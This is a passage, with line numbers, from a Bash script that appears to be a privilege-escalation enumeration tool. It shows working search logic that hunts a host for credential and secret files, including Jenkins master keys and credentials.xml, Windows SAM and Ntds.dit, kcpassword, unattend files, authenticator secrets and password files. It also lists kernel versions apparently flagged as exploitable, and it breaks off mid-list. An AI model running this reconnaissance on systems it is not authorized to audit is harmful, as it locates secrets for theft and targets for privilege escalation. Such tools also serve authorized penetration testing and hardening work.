"$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) 908 PSTORAGE_KCPASSWORD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "kcpassword$" | sort | uniq | head -n 70) 909 PSTORAGE_SENTRY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) 910 PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "environments$" | sort | uniq | head -n 70) 911 PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "cacti$" | sort | uniq | head -n 70) 912 PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "roundcube$" | sort | uniq | head -n 70) 913 PSTORAGE_PASSBOLT=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) 914 PSTORAGE_JETTY=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) 915 PSTORAGE_JENKINS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CDROM\n$FIND_DIR_RUN\n$FIND_DIR_VAR\n$FIND_DIR_MNT\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" | sort | uniq | head -n 70) 916 PSTORAGE_WGET=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) 917 PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) 918 PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) 919 PSTORAGE_WINDOWS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$" | sort | uniq | head -n 70) 920 PSTORAGE_DATABASE=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/man/|/usr/|/var/cache/|/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache' | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) 921 PSTORAGE_BACKUPS=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "backup$|backups$" | sort | uniq | head -n 70) 922 PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.maintenance.*$|.*\.key$" | sort | uniq | head -n 70) 923 PSTORAGE_CRONTAB_UI=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}media|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}var|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin" | grep -E "crontab\.db$|crontab-ui\.service$" | sort | uniq | head -n 70) 924 925 ##### POST SERACH VARIABLES ##### 926 backup_folders_row="$(echo $PSTORAGE_BACKUPS | tr '\n' ' ')" 927 printf ${YELLOW}"DONE\n"$NC 928 echo "" 929 fi 930 931 932 933 934 # Variables 935 936 kernelB=" 4.0.[0-9]+| 4.1.[0-9]+| 4.2.[0-9]+| 4.3.[0-9]+| 4.4.[0-9]+| 4.5.[0-9]+| 4.6.[0-9]+| 4.7.[0-9]+| 4.8.[0-9]+| 4.9.[0-9]+| 4.10.[0-9]+| 4.11.[0-9]+| 4.12.[0-9]+| 4.13.[0-9]+| 3.9.6| 3.9.0| 3.9| 3.8.9| 3.8.8| 3.8.7| 3.8.6| 3.8.5| 3.8.4| 3.8.3| 3.8.2| 3.8.1| 3.8.0| 3.8| 3.7.6| 3.7.0| 3.7| 3.6.0| 3.6| 3.5.0| 3.5| 3.4.9| 3.4.8| 3.4.6| 3.4.5| 3.4.4| 3.4.3| 3.4.2| 3.4.1| 3.4.0| 3.4| 3.3| 3.2| 3.19.0| 3.16.0| 3.15| 3.14| 3.13.1| 3.13.0| 3.13| 3.12.0| 3.12| 3.11.0| 3.11| 3.10.6| 3.10.0| 3.10| 3.1.0| 3.0.6| 3.0.5| 3.0.4| 3.0.3| 3.0.2| 3.0.1| 3.0.0| 2.6.9| 2.6.8| 2.6.7| 2.6.6| 2.6.5| 2.6.4| 2.6.39| 2.6.38| 2.6.37| 2.6.36| 2.6.35| 2.6.34| 2.6.33| 2.6.32| 2.6.31| 2.6.30| 2.6.3| 2.6.29| 2.6.28| 2.6.27| 2.6.26| 2.6.25| 2.6.24.1| 2.6.24| 2.6.23| 2.6.22| 2.6.21| 2.6.20| 2.6.2| 2.6.19| 2.6.18| 2.6.17| 2.6.16| 2.6.15| 2.6.14| 2.6.13| 2.6.12| 2.6.11| 2.6.10| 2.6.1| 2.6.0| 2.4.9| 2.4.8| 2.4.7| 2.4.6| 2.4.5| 2.4.4| 2.4.37| 2.4.36| 2.4.35| 2.4.34| 2.4.33| 2.4.32| 2.4.31| 2.4.30| 2.4.29| 2.4.28| 2.4.27| 2.4.26| 2.4.25| 2.4.24| 2.4.23| 2.4.22| 2.4.21| 2.4.20| 2.4.19| 2.4.18| 2.4.17| 2.4.16| 2.4.15| 2.4.14| 2.4.13| 2.4.12| 2.4.11| 2.4.10| 2.2.24" 937 kernelDCW_Ubuntu_Precise_1="3.1.1-1400-linaro-lt-mx5|3.11.0-13-generic|3.11.0-14-generic|3.11.0-15-generic|3.11.0-17-generic|3.11.0-18-generic|3.11.0-20-generic|3.11.0-22-generic|3.11.0-23-generic|3.11.0-24-generic|3.11.0-26-generic|3.13.0-100-generic|3.13.0-24-generic|3.13.0-27-generic|3.13.0-29-generic|3.13.0-30-generic|3.13.0-32-generic|3.13.0-33-generic|3.13.0-34-generic|3.13.0-35-generic|3.13.0-36-generic|3.13.0-37-generic|3.13.0-39-generic|3.13.0-40-generic|3.13.0-41-generic|3.13.0-43-generic|3.13.0-44-generic|3.13.0-46-generic|3.13.0-48-generic|3.13.0-49-generic|3.13.0-51-generic|3.13.0-52-generic|3.13.0-53-generic|3.13.0-54-generic|3.13.0-55-generic|3.13.0-57-generic|3.13.0-58-generic|3.13.0-59-generic|3.13.0-61-generic|3.13.0-62-generic|3.13.0-63-generic|3.13.0-65-generic|3.13.0-66-generic|3.13.0-67-generic|3.13.0-68-generic|3.13.0-71-generic|3.13.0-73-generic|3.13.0-74-generic|3.13.0-76-generic|3.13.0-77-generic|3.13.0-79-generic|3.13.0-83-generic|3.13.0-85-generic|3.13.0-86-generic|3.13.0-88-generic|3.13.0-91-generic|3.13.0-92-generic|3.13.0-93-generic|3.13.0-95-generic|3.13.0-96-generic|3.13.0-98-generic|3.2.0-101-generic|3.2.0-101-generic-pae|3.2.0-101-virtual|3.2.0-102-generic|3.2.0-102-generic-pae|3.2.0-102-virtual" 938 kernelDCW_Ubuntu_Precise_2="3.2.0-104-generic|3.2.0-104-generic-pae|3.2.0-104-virtual|3.2.0-105-generic|3.2.0-105-generic-pae|3.2.0-105-virtual|3.2.0-106-generic|3.2.0-106-generic-pae|3.2.0-106-virtual|3.2.0-107-generic|3.2.0-107-generic-pae|3.2.0-107-virtual|3.2.0-109-generic|3.2.0-109-generic-pae|3.2.0-109-virtual|3.2.0-110-generic|3.2.0-110-generic-pae|3.2.0-110-virtual|3.2.0-111-generic|3.2.0-111-generic-pae|3.2.0-111-virtual|3.2.0-1412-omap4|3.2.0-1602-armadaxp|3.2.0-23-generic|3.2.0-23-generic-pae|3.2.0-23-lowlatency|3.2.0-23-lowlatency-pae|3.2.0-23-omap|3.2.0-23-powerpc-smp|3.2.0-23-powerpc64-smp|3.2.0-23-virtual|3.2.0-24-generic|3.2.0-24-generic-pae|3.2.0-24-virtual|3.2.0-25-generic|3.2.0-25-generic-pae|3.2.0-25-virtual|3.2.0-26-generic|3.2.0-26-generic-pae|3.2.0-26-virtual|3.2.0-27-generic|3.2.0-27-generic-pae|3.2.0-27-virtual|3.2.0-29-generic|3.2.0-29-generic-pae|3.2.0-29-virtual|3.2.0-31-generic|3.2.0-31-generic-pae|3.2.0-31-virtual|3.2.0-32-generic|3.2.0-32-generic-pae|3.2.0-32-virtual|3.2.0-33-generic|3.2.0-33-generic-pae|3.2.0-33-lowlatency|3.2.0-33-lowlatency-pae|3.2.0-33-virtual|3.2.0-34-generic|3.2.0-34-generic-pae|3.2.0-34-virtual|3.2.0-35-generic|3.2.0-35-generic-pae|3.2.0-35-lowlatency|3.2.0-35-lowlatency-